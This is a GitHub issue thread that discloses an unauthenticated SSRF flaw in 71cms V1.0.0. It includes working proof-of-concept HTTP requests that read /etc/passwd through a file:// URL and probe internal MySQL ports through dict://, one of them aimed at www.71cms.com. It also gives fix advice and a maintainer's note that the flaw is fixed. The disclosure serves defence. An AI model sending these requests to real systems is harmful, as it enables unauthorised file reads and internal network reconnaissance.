### ISSUE TITLE
SSRF-vulnerability exists in 71cms V1.0.0

### ISSUE THREAD

**Issue by wisejayer** [xiaocheng-keji/71cms#2]
# SSRF-vulnerability
## Vulnerability Description
71CMS pioneered the Party building system with openness that keeps pace with the times, solving the problems of grass-roots Party building propaganda difficulty, learning material dissemination difficulty, inconvenient network, limited working environment, etc.

Because the open source project interface `admin/bigdata/geweather.html` without authorization to access, and the client submitted data without any verification in 71cms V1.0.0, malicious users do not need to authenticate login, you can send malicious data, SSRF attacks.
## Vulnerability Impact
1、Go to github and pull open source code `github.com/xiaocheng-keji/71cms`

2、Details of the vulnerability
`application/admin/controller/Bigdata.php`
![image](https://github.com/wisejayer/SSRF-vulnerability/assets/52852582/dd1fce4f-de93-48a6-a464-eb193ceb1436)

3、Arbitrary file read
Try reading the local/etc/passwd file
```bash
GET /admin/bigdata/getweather.html?url=file:///etc/passwd HTTP/1.1
Host: *.*.*.*
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


```
Through this request you can get the content of etc/passwd files
![image](https://github.com/wisejayer/SSRF-vulnerability/assets/52852582/756c23c4-d5f3-4ca0-b9a4-a00e50b68361)
4、Port discovery
Test 3306 port
```bash
GET /admin/bigdata/getweather.html?url=dict://127.0.0.1:3306 HTTP/1.1
Host: *.*.*.*
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


````
![image](https://github.com/wisejayer/SSRF-vulnerability/assets/52852582/8bc1dba8-bb5e-4737-977f-10d7ec250f3f)
Test 13306 port
```bash
GET /admin/bigdata/getweather.html?url=dict://127.0.0.1:13306 HTTP/1.1
Host: www.71cms.com
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


```
![image](https://github.com/wisejayer/SSRF-vulnerability/assets/52852582/d60fb351-9d30-4b85-91d1-e8956c3b822e)
After port testing, you can see that the returned characteristics are different; if the port is not open, the status code 500 will return, and the characteristics are obvious.
## Repair Recommendation
1、Limit protocols to HTTP, HTTPS, disable unwanted protocols.

2、Add authentication, set URL whitelist or restrict intranet IP. 

3、Unify error messages to prevent users from judging the port status of remote servers based on error messages .

**Comment by nnly055** [comment]
Thank you very much for raising the issues! The vulnerability has now been fixed.
